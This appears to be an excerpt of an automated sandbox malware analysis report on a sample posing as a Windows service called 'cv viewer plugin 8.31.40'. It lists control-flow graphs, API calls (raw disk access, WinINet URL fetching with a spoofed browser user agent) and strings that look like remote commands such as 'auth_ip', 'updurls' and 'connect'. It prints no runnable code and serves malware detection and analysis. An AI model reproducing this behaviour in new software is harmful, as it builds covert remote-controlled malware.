                                                    control_flow_graph 872 16af8a3-16af8ce CreateFileA 873 16af99f-16af9a6 872->873 874 16af8d4-16af8e9 872->874 875 16af8ec-16af90e DeviceIoControl 874->875 876 16af910-16af918 875->876 877 16af947-16af94f 875->877 880 16af91a-16af91f 876->880 881 16af921-16af926 876->881 878 16af958-16af95a 877->878 879 16af951-16af957 call 16b37a8 877->879 883 16af95c-16af95f 878->883 884 16af995-16af99e FindCloseChangeNotification 878->884 879->878 880->877 881->877 885 16af928-16af930 881->885 888 16af97b-16af988 call 16b3b4c 883->888 889 16af961-16af96a GetLastError 883->889 884->873 886 16af933-16af938 885->886 886->886 890 16af93a-16af946 call 16af6f6 886->890 888->884 896 16af98a-16af990 888->896 889->884 891 16af96c-16af96f 889->891 890->877 891->888 894 16af971-16af978 891->894 894->888 896->875
                                                    APIs
                                                    • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 016AF8C2
                                                    • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 016AF900
                                                    • GetLastError.KERNEL32 ref: 016AF961
                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 016AF998
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                    • String ID: \\.\PhysicalDrive0
                                                    • API String ID: 3786717961-1180397377
                                                    • Opcode ID: fb08ec1620ea3971c7e2ecc534fbccd14e5c6f11cb152b9d7bc34a2d6098a12f
                                                    • Instruction ID: f4ea6f50e1714d678068e3e73aa62e81c62884c3878329c8a385a56286629756
                                                    • Opcode Fuzzy Hash: fb08ec1620ea3971c7e2ecc534fbccd14e5c6f11cb152b9d7bc34a2d6098a12f
                                                    • Instruction Fuzzy Hash: 53319E75E0021ABBDB24CF99DC84ABEBBB9EF05750F6041ADE514A7280DB705E00CF95

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 898 401a4f-401a77 CreateFileA 899 401b45-401b4a 898->899 900 401a7d-401a91 898->900 901 401a98-401ac0 DeviceIoControl 900->901 902 401ac2-401aca 901->902 903 401af3-401afb 901->903 906 401ad4-401ad9 902->906 907 401acc-401ad2 902->907 904 401b04-401b07 903->904 905 401afd-401b03 call 402ca6 903->905 909 401b09-401b0c 904->909 910 401b3a-401b44 FindCloseChangeNotification 904->910 905->904 906->903 911 401adb-401af1 call 402cc0 call 4018cc 906->911 907->903 913 401b27-401b34 call 402c98 909->913 914 401b0e-401b17 GetLastError 909->914 910->899 911->903 913->901 913->910 914->910 916 401b19-401b1c 914->916 916->913 919 401b1e-401b24 916->919 919->913
                                                    APIs
                                                    • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                    • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                    • GetLastError.KERNEL32 ref: 00401B0E
                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                    • String ID: \\.\PhysicalDrive0
                                                    • API String ID: 3786717961-1180397377
                                                    • Opcode ID: 3afb43cc3dedd2849d90584800b0b4b1cc754ecdd9339dbac4238ad8ee4012bf
                                                    • Instruction ID: fc4aaa1cf60edb7db06fdbd05dea25136cd7d186831ecbc7bbbcf924abbffa34
                                                    • Opcode Fuzzy Hash: 3afb43cc3dedd2849d90584800b0b4b1cc754ecdd9339dbac4238ad8ee4012bf
                                                    • Instruction Fuzzy Hash: 74318B71D00218EADB21AFA5CD849EFBBB9FF41750F20407AE554B32A0E7785E45CB98

                                                    Control-flow Graph

                                                    APIs
                                                    • GetVersion.KERNEL32 ref: 00402ED6
                                                      • Part of subcall function 00403FF4: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F0F,00000000), ref: 00404005
                                                      • Part of subcall function 00403FF4: HeapDestroy.KERNEL32 ref: 00404044
                                                    • GetCommandLineA.KERNEL32 ref: 00402F24
                                                    • GetStartupInfoA.KERNEL32(?), ref: 00402F4F
                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402F72
                                                      • Part of subcall function 00402FCB: ExitProcess.KERNEL32 ref: 00402FE8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                    • String ID: Y
                                                    • API String ID: 2057626494-4136946213
                                                    • Opcode ID: bde1f74d60b81ae7252d13bfcbc661632079e5aa7379041ec1857b7291440294
                                                    • Instruction ID: ae24bdd31f92ba5c0019e7eb98566f973638ce5b9b082510a96f2684413349a7
                                                    • Opcode Fuzzy Hash: bde1f74d60b81ae7252d13bfcbc661632079e5aa7379041ec1857b7291440294
                                                    • Instruction Fuzzy Hash: 3721A1B1840615ABDB14AFA6DE4AA6E7FB8EF44705F10413FF501B72D1DB384500CB58
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: /chk
                                                    • API String ID: 0-3837807730
                                                    • Opcode ID: 041d0f14a923b82a6c3021906bd1a3eff53d0db1b8c09e981d880e2dbe50ce4f
                                                    • Instruction ID: abca926218db33814d0e386390dc92075aaaeddfe6fa786c26165fc9e58d726a
                                                    • Opcode Fuzzy Hash: 041d0f14a923b82a6c3021906bd1a3eff53d0db1b8c09e981d880e2dbe50ce4f
                                                    • Instruction Fuzzy Hash: D3119E31945222FFC70267704E4999837A0BA16744360417BD882FB2D1D37D884BE3DF
                                                    APIs
                                                    • StartServiceCtrlDispatcherA.ADVAPI32 ref: 0040D45C
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: CtrlDispatcherServiceStart
                                                    • String ID:
                                                    • API String ID: 3789849863-0
                                                    • Opcode ID: b5fc6ee14610f6b693ca5c07d87a9bd7fc608215c552859115a083d7c793dac0
                                                    • Instruction ID: b9e6f3ce6bba2d47b96b741d0e55b377b0e4ed0441961095dc5480d58c32acb9
                                                    • Opcode Fuzzy Hash: b5fc6ee14610f6b693ca5c07d87a9bd7fc608215c552859115a083d7c793dac0
                                                    • Instruction Fuzzy Hash: 73B0122000D3D09ECB0213200E180603F645D0F30130520E280C9580938534000EA61A
                                                    APIs
                                                    • StartServiceCtrlDispatcherA.ADVAPI32 ref: 0040D45C
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: CtrlDispatcherServiceStart
                                                    • String ID:
                                                    • API String ID: 3789849863-0
                                                    • Opcode ID: c00e74b19ae621a7deadbf3e99bb00879fc209d69179b3c58daa50a486d6922b
                                                    • Instruction ID: 8acdd858522255d762781590da5c1b6f26d2790912bac70c602002f2113feaf7
                                                    • Opcode Fuzzy Hash: c00e74b19ae621a7deadbf3e99bb00879fc209d69179b3c58daa50a486d6922b
                                                    • Instruction Fuzzy Hash: DFA0027040C212DAC50037D05F4C475262CA60E356B215476A14FB41D6CA78104FB93F

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 16a72a7-16a72bf InternetOpenA 1 16a7385-16a738b 0->1 2 16a72c5-16a7319 InternetSetOptionA * 3 call 16b4af0 0->2 4 16a738d-16a7393 1->4 5 16a73a7-16a73b5 1->5 8 16a731e-16a733c InternetOpenUrlA 2->8 9 16a7399-16a73a6 call 16a53ec 4->9 10 16a7395-16a7397 4->10 6 16a73bb-16a73df call 16b4af0 call 16a439c 5->6 7 16a66f0-16a66f2 5->7 6->7 31 16a73e5-16a7413 RtlEnterCriticalSection RtlLeaveCriticalSection call 16b233c 6->31 12 16a66fb-16a66fd 7->12 13 16a66f4-16a66f9 7->13 14 16a737e-16a737f InternetCloseHandle 8->14 15 16a733e 8->15 9->5 10->5 19 16a670a-16a673e RtlEnterCriticalSection RtlLeaveCriticalSection 12->19 20 16a66ff 12->20 21 16a6704 Sleep 13->21 14->1 22 16a7342-16a7368 InternetReadFile 15->22 26 16a678e 19->26 27 16a6740-16a674c 19->27 20->21 21->19 24 16a736a-16a7371 22->24 25 16a7373-16a737a InternetCloseHandle 22->25 24->22 25->14 28 16a6792 26->28 27->26 30 16a674e-16a675b 27->30 28->0 32 16a675d-16a6761 30->32 33 16a6763-16a6764 30->33 38 16a7469-16a7484 call 16b233c 31->38 39 16a7415-16a7427 call 16b233c 31->39 35 16a6768-16a678c call 16b4af0 * 2 32->35 33->35 35->28 47 16a748a-16a748c 38->47 48 16a773e-16a7750 call 16b233c 38->48 39->38 49 16a7429-16a743b call 16b233c 39->49 47->48 50 16a7492-16a7544 call 16b2fac RtlEnterCriticalSection RtlLeaveCriticalSection call 16b4af0 * 5 call 16a439c * 2 47->50 58 16a7799-16a77a2 call 16b233c 48->58 59 16a7752-16a7754 48->59 49->38 56 16a743d-16a744f call 16b233c 49->56 115 16a7581 50->115 116 16a7546-16a7548 50->116 56->38 68 16a7451-16a7463 call 16b233c 56->68 65 16a77a7-16a77ab 58->65 59->58 63 16a7756-16a7794 call 16b4af0 RtlEnterCriticalSection RtlLeaveCriticalSection 59->63 63->7 69 16a77cc-16a77de call 16b233c 65->69 70 16a77ad-16a77bb call 16a61f1 call 16a62ff 65->70 68->7 68->38 83 16a7afc-16a7b0e call 16b233c 69->83 84 16a77e4-16a77e6 69->84 86 16a77c0-16a77c7 call 16a640a 70->86 83->7 96 16a7b14-16a7b42 call 16b2fac call 16b4af0 call 16a439c 83->96 84->83 88 16a77ec-16a7803 call 16a439c 84->88 86->7 88->7 97 16a7809-16a78d7 call 16b2418 call 16a1ba7 88->97 117 16a7b4b-16a7b52 call 16b2f74 96->117 118 16a7b44-16a7b46 call 16a534d 96->118 113 16a78d9 call 16a143f 97->113 114 16a78de-16a78ff RtlEnterCriticalSection 97->114 113->114 121 16a790b-16a7941 RtlLeaveCriticalSection call 16a3c67 call 16a3d7e 114->121 122 16a7901-16a7908 114->122 119 16a7585-16a75b3 call 16b2fac call 16b4af0 call 16a439c 115->119 116->115 123 16a754a-16a755c call 16b233c 116->123 117->7 118->117 146 16a75f4-16a75fd call 16b2f74 119->146 147 16a75b5-16a75c4 call 16b35e6 119->147 138 16a7946-16a7963 call 16a833b 121->138 122->121 123->115 135 16a755e-16a757f call 16a439c 123->135 135->119 142 16a7968-16a796f 138->142 144 16a7ae3-16a7af7 call 16a9003 142->144 145 16a7975-16a79af call 16aa725 142->145 144->7 152 16a79b4-16a79bd 145->152 158 16a7603-16a761b call 16b3b4c 146->158 159 16a7734-16a7737 146->159 147->146 160 16a75c6 147->160 156 16a7aad-16a7ade call 16a83ea call 16a33b2 152->156 157 16a79c3-16a79ca 152->157 156->144 162 16a79cd-16a79d2 157->162 172 16a761d-16a7625 call 16a9737 158->172 173 16a7627 158->173 159->48 164 16a75cb-16a75dd call 16b2850 160->164 162->162 166 16a79d4-16a7a11 call 16aa725 162->166 174 16a75df 164->174 175 16a75e2-16a75f2 call 16b35e6 164->175 176 16a7a16-16a7a1f 166->176 178 16a7629-16a765d call 16aa84f call 16a3863 172->178 173->178 174->175 175->146 175->164 176->156 181 16a7a25-16a7a2b 176->181 188 16a7662-16a767e call 16a5119 178->188 185 16a7a2e-16a7a33 181->185 185->185 187 16a7a35-16a7a70 call 16aa725 185->187 187->156 193 16a7a72-16a7aa6 call 16ad117 187->193 192 16a7683-16a76b4 call 16a3863 call 16aaaf5 188->192 199 16a76b9-16a76cb call 16aac0f 192->199 196 16a7aab-16a7aac 193->196 196->156 201 16a76d0-16a76e1 199->201 202 16a76e8-16a76f7 Sleep 201->202 203 16a76e3 call 16a380b 201->203 205 16a76ff-16a7713 call 16b18f0 202->205 203->202 207 16a771f-16a772d 205->207 208 16a7715-16a771e call 16a4100 205->208 207->159 210 16a772f call 16a380b 207->210 208->207 210->159
                                                    APIs
                                                    • Sleep.KERNELBASE(0000EA60), ref: 016A6704
                                                    • RtlEnterCriticalSection.NTDLL(016D71E0), ref: 016A670F
                                                    • RtlLeaveCriticalSection.NTDLL(016D71E0), ref: 016A6720
                                                    • _memset.LIBCMT ref: 016A6775
                                                    • _memset.LIBCMT ref: 016A6784
                                                    • InternetOpenA.WININET(?), ref: 016A72B1
                                                    • InternetSetOptionA.WININET(00000000,00000002,?), ref: 016A72D9
                                                    • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 016A72F1
                                                    • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 016A7309
                                                    • _memset.LIBCMT ref: 016A7319
                                                    • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 016A7332
                                                    • InternetReadFile.WININET(00000000,?,00001000,?), ref: 016A7354
                                                    • InternetCloseHandle.WININET(00000000), ref: 016A7374
                                                    • InternetCloseHandle.WININET(00000000), ref: 016A737F
                                                    • _memset.LIBCMT ref: 016A73C7
                                                    • RtlEnterCriticalSection.NTDLL(016D71E0), ref: 016A73EA
                                                    • RtlLeaveCriticalSection.NTDLL(016D71E0), ref: 016A73FB
                                                    • _malloc.LIBCMT ref: 016A7494
                                                    • RtlEnterCriticalSection.NTDLL(016D71E0), ref: 016A74A6
                                                    • RtlLeaveCriticalSection.NTDLL(016D71E0), ref: 016A74B2
                                                    • _memset.LIBCMT ref: 016A74CC
                                                    • _memset.LIBCMT ref: 016A74DB
                                                    • _memset.LIBCMT ref: 016A74EB
                                                    • _memset.LIBCMT ref: 016A74FE
                                                    • _memset.LIBCMT ref: 016A7514
                                                    • _malloc.LIBCMT ref: 016A758A
                                                    • _memset.LIBCMT ref: 016A759B
                                                    • _strtok.LIBCMT ref: 016A75BB
                                                    • _swscanf.LIBCMT ref: 016A75D2
                                                    • _strtok.LIBCMT ref: 016A75E9
                                                    • _free.LIBCMT ref: 016A75F5
                                                    • Sleep.KERNEL32(000007D0), ref: 016A76ED
                                                    • _memset.LIBCMT ref: 016A7761
                                                    • RtlEnterCriticalSection.NTDLL(016D71E0), ref: 016A776E
                                                    • RtlLeaveCriticalSection.NTDLL(016D71E0), ref: 016A7780
                                                    • _sprintf.LIBCMT ref: 016A781E
                                                    • RtlEnterCriticalSection.NTDLL(00000020), ref: 016A78E2
                                                    • RtlLeaveCriticalSection.NTDLL(00000020), ref: 016A7916
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _memset$CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                    • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                    • API String ID: 696907137-1839899575
                                                    • Opcode ID: 36b2bd9c99e36ce615f23ceb08345394677c1685d45acf75402c66af59d0fa42
                                                    • Instruction ID: b6f629115f42f195937e5ba4b427e19c7c217a4825429d1caf8b2b6eb7d3e1d2
                                                    • Opcode Fuzzy Hash: 36b2bd9c99e36ce615f23ceb08345394677c1685d45acf75402c66af59d0fa42
                                                    • Instruction Fuzzy Hash: 62321231509382AFD730AB64CC40BEFBBE6AF95310F54082DF58997291EB71A944CF96

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 471 40235e-402363 472 4023b0 471->472 473 402365-40236e 471->473 473->472 474 402370-4023aa GetLastError SetServiceStatus SetEvent 473->474 474->472
                                                    APIs
                                                    • GetLastError.KERNEL32 ref: 0040238D
                                                    • SetServiceStatus.ADVAPI32(0040C408), ref: 0040239E
                                                    • SetEvent.KERNEL32 ref: 004023AA
                                                    • RegisterServiceCtrlHandlerA.ADVAPI32(cv viewer plugin 8.31.40,0040235E), ref: 004023C1
                                                    • SetServiceStatus.SECHOST(0040C408), ref: 00402420
                                                    • GetLastError.KERNEL32 ref: 00402422
                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                    • GetLastError.KERNEL32 ref: 00402450
                                                    • SetServiceStatus.ADVAPI32(0040C408), ref: 00402480
                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                    • CloseHandle.KERNEL32 ref: 004024A1
                                                    • SetServiceStatus.ADVAPI32(0040C408), ref: 004024CA
                                                    Strings
                                                    • cv viewer plugin 8.31.40, xrefs: 004023BC
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: Service$Status$ErrorLast$CreateEvent$CloseCtrlHandleHandlerObjectRegisterSingleThreadWait
                                                    • String ID: cv viewer plugin 8.31.40
                                                    • API String ID: 1146649175-1065624713
                                                    • Opcode ID: 6e22bcf1a49f53f178e58c6dfae594d9b8a648071703c43772e3066ef5dbfd72
                                                    • Instruction ID: 2c5ef1149cd964d13f04c3a7fa45fc58864e945b550645c9537f471364d5459d
                                                    • Opcode Fuzzy Hash: 6e22bcf1a49f53f178e58c6dfae594d9b8a648071703c43772e3066ef5dbfd72
                                                    • Instruction Fuzzy Hash: AE311671440210EBC3109F26EFE9A267FA8FB95795B11863AE544B22B2C7B90509CF6D

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 016A1D11
                                                    • GetLastError.KERNEL32 ref: 016A1D23
                                                      • Part of subcall function 016A1712: __EH_prolog.LIBCMT ref: 016A1717
                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 016A1D59
                                                    • GetLastError.KERNEL32 ref: 016A1D6B
                                                    • __beginthreadex.LIBCMT ref: 016A1DB1
                                                    • GetLastError.KERNEL32 ref: 016A1DC6
                                                    • CloseHandle.KERNEL32(00000000), ref: 016A1DDD
                                                    • CloseHandle.KERNEL32(00000000), ref: 016A1DEC
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 016A1E14
                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 016A1E1B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseErrorLast$CreateEventHandle$ChangeFindH_prologNotificationObjectSingleWait__beginthreadex
                                                    • String ID: thread$thread.entry_event$thread.exit_event
                                                    • API String ID: 4246062733-3017686385
                                                    • Opcode ID: bb64a582303ae9deac5a853f37e4d882b160fa2380c9e8af7b8808ad19db11c0
                                                    • Instruction ID: c42f3407ffefcdd4beb2181f38803d43754b816dba0e51a5e534eb01af15266f
                                                    • Opcode Fuzzy Hash: bb64a582303ae9deac5a853f37e4d882b160fa2380c9e8af7b8808ad19db11c0
                                                    • Instruction Fuzzy Hash: 6D318775A003029FDB10EF24CC88B2BBBA9FB95650F10496DF9558B394DB709D49CFA2

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 504 16a4603-16a463b call 16c53f0 call 16b0b10 call 16b3b4c 511 16a463d-16a4645 call 16a9737 504->511 512 16a4647 504->512 514 16a4649-16a465c call 16aa84f 511->514 512->514 518 16a4661-16a4664 514->518 519 16a4683-16a4687 518->519 520 16a4666-16a4672 htons 518->520 523 16a4689-16a46db htonl * 2 htons call 16a3d7e call 16a833b 519->523 524 16a46f1-16a47f8 call 16a1ba7 call 16adef3 htons call 16b2418 call 16a7d24 call 16a7cfe * 2 call 16a898c call 16a84b1 519->524 521 16a4678-16a4681 520->521 522 16a48ae-16a48c1 call 16b3b4c 520->522 521->518 521->519 532 16a48cd 522->532 533 16a48c3-16a48cb call 16a9737 522->533 536 16a46e0-16a46e4 523->536 576 16a47fa-16a4805 524->576 577 16a4871-16a487a 524->577 537 16a48cf-16a4917 call 16aa84f call 16a3c67 call 16a3d7e call 16a833b 532->537 533->537 536->522 540 16a46ea-16a46ec 536->540 557 16a4b38-16a4b43 537->557 558 16a491d-16a494a call 16aa725 537->558 540->522 561 16a4b4a-16a4b53 557->561 562 16a4b45 call 16a380b 557->562 558->557 572 16a4950-16a495a 558->572 566 16a4b5a-16a4b76 call 16a898c 561->566 567 16a4b55 call 16a380b 561->567 562->561 567->566 573 16a4960-16a4977 call 16a83b1 572->573 574 16a4a07-16a4a09 572->574 589 16a4979-16a499d htonl * 2 573->589 590 16a499f-16a49b7 573->590 582 16a4a0a-16a4a33 call 16aa725 574->582 581 16a4809-16a4813 576->581 579 16a487c call 16a143f 577->579 580 16a4881-16a48a5 call 16a898c * 2 577->580 579->580 580->522 606 16a48a7-16a48a9 call 16a143f 580->606 585 16a486e 581->585 586 16a4815-16a4841 call 16a833b 581->586 582->557 597 16a4a39-16a4a5e call 16aa725 582->597 585->577 599 16a486c 586->599 600 16a4843-16a4863 call 16a82b5 call 16a8509 586->600 594 16a49ba-16a49e2 call 16a3bd3 htonl * 2 call 16a83b1 589->594 590->594 612 16a49e7-16a4a05 htons * 2 594->612 597->557 607 16a4a64-16a4a8d call 16aa725 597->607 599->585 600->581 617 16a4865-16a486a call 16a143f 600->617 606->522 607->557 616 16a4a93-16a4b11 call 16a3863 * 2 call 16aa8ac call 16aa94b call 16a4bad call 16a3863 * 2 call 16a44ab 607->616 612->582 635 16a4b16-16a4b2d call 16b18f0 616->635 617->581 635->557 638 16a4b2f-16a4b37 call 16a4100 635->638 638->557
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016A4608
                                                      • Part of subcall function 016B3B4C: _malloc.LIBCMT ref: 016B3B64
                                                    • htons.WS2_32(?), ref: 016A4669
                                                    • htonl.WS2_32(?), ref: 016A468C
                                                    • htonl.WS2_32(00000000), ref: 016A4693
                                                    • htons.WS2_32(00000000), ref: 016A4747
                                                    • _sprintf.LIBCMT ref: 016A475D
                                                      • Part of subcall function 016A898C: _memmove.LIBCMT ref: 016A89AC
                                                    • htons.WS2_32(?), ref: 016A46B0
                                                      • Part of subcall function 016A9737: __EH_prolog.LIBCMT ref: 016A973C
                                                      • Part of subcall function 016A9737: RtlEnterCriticalSection.NTDLL(00000020), ref: 016A97B7
                                                      • Part of subcall function 016A9737: RtlLeaveCriticalSection.NTDLL(00000020), ref: 016A97D5
                                                      • Part of subcall function 016A1BA7: __EH_prolog.LIBCMT ref: 016A1BAC
                                                      • Part of subcall function 016A1BA7: RtlEnterCriticalSection.NTDLL ref: 016A1BBC
                                                      • Part of subcall function 016A1BA7: RtlLeaveCriticalSection.NTDLL ref: 016A1BEA
                                                      • Part of subcall function 016A1BA7: RtlEnterCriticalSection.NTDLL ref: 016A1C13
                                                      • Part of subcall function 016A1BA7: RtlLeaveCriticalSection.NTDLL ref: 016A1C56
                                                      • Part of subcall function 016ADEF3: __EH_prolog.LIBCMT ref: 016ADEF8
                                                    • htonl.WS2_32(?), ref: 016A497C
                                                    • htonl.WS2_32(00000000), ref: 016A4983
                                                    • htonl.WS2_32(00000000), ref: 016A49C8
                                                    • htonl.WS2_32(00000000), ref: 016A49CF
                                                    • htons.WS2_32(?), ref: 016A49EF
                                                    • htons.WS2_32(?), ref: 016A49F9
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                    • String ID:
                                                    • API String ID: 1645262487-0
                                                    • Opcode ID: 99ad90c3faa92967f7bd0e874b563c7eecde9432bba1510f63d12e67f27e6fd9
                                                    • Instruction ID: 805dea724b17bd46fd5d592bf662a1b504c332c9b64144f0ed918d42eadecafb
                                                    • Opcode Fuzzy Hash: 99ad90c3faa92967f7bd0e874b563c7eecde9432bba1510f63d12e67f27e6fd9
                                                    • Instruction Fuzzy Hash: 83026871C0125AEEDF11DBA4CC44BEEBBB9AF18304F54415AE505A7280DBB46E88CFA5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 641 16a4d86-16a4dcb call 16c53f0 call 16b0b10 RtlEnterCriticalSection RtlLeaveCriticalSection 646 16a4dd1 641->646 647 16a50d4-16a50dd 641->647 650 16a4dd6-16a4e00 call 16a3863 call 16a4bed 646->650 648 16a50df call 16a380b 647->648 649 16a50e4-16a50f4 647->649 648->649 656 16a50a1-16a50ad RtlEnterCriticalSection RtlLeaveCriticalSection 650->656 657 16a4e06-16a4e0b 650->657 658 16a50b3-16a50ce RtlEnterCriticalSection RtlLeaveCriticalSection 656->658 659 16a506e-16a5070 657->659 660 16a4e11-16a4e3a call 16aced9 657->660 658->647 658->650 659->656 662 16a5072-16a509f call 16aa725 659->662 660->656 665 16a4e40-16a4e5c call 16a7d24 660->665 662->656 662->658 669 16a4e5e-16a4e7c call 16aced9 665->669 670 16a4ec4-16a4ec8 665->670 674 16a4e81-16a4e87 669->674 672 16a4eca-16a4ef9 call 16aced9 670->672 673 16a4e8d-16a4e99 RtlEnterCriticalSection RtlLeaveCriticalSection 670->673 672->673 682 16a4efb-16a4f2c call 16aced9 672->682 675 16a4e9f-16a4ea6 RtlEnterCriticalSection RtlLeaveCriticalSection 673->675 674->673 677 16a4f98-16a4fc1 call 16aced9 674->677 678 16a4eac-16a4ebf call 16a898c 675->678 686 16a4fc7-16a4ff0 call 16aced9 677->686 687 16a5064-16a5069 677->687 678->658 682->673 690 16a4f32-16a4f93 call 16ad00b call 16a898c call 16a8701 call 16a898c 682->690 686->687 694 16a4ff2-16a5028 call 16a7cfe call 16aa9b2 call 16aaa8a 686->694 687->675 690->677 705 16a502d-16a5050 call 16a898c call 16b18f0 694->705 705->678 710 16a5056-16a505f call 16a4100 705->710 710->678
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016A4D8B
                                                    • RtlEnterCriticalSection.NTDLL(016D71E0), ref: 016A4DB7
                                                    • RtlLeaveCriticalSection.NTDLL(016D71E0), ref: 016A4DC3
                                                      • Part of subcall function 016A4BED: __EH_prolog.LIBCMT ref: 016A4BF2
                                                      • Part of subcall function 016A4BED: InterlockedExchange.KERNEL32(?,00000000), ref: 016A4CF2
                                                    • RtlEnterCriticalSection.NTDLL(016D71E0), ref: 016A4E93
                                                    • RtlLeaveCriticalSection.NTDLL(016D71E0), ref: 016A4E99
                                                    • RtlEnterCriticalSection.NTDLL(016D71E0), ref: 016A4EA0
                                                    • RtlLeaveCriticalSection.NTDLL(016D71E0), ref: 016A4EA6
                                                    • RtlEnterCriticalSection.NTDLL(016D71E0), ref: 016A50A7
                                                    • RtlLeaveCriticalSection.NTDLL(016D71E0), ref: 016A50AD
